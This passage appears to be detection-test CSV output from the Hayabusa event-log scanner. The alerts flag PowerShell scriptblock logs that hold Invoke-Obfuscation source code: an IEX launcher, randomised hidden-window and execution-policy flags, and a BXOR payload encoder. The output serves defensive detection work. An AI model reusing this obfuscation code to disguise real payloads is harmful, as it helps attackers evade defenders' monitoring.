@('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' ,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. $PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. $NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random -Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBou",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8 3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 16 0 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. $HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + 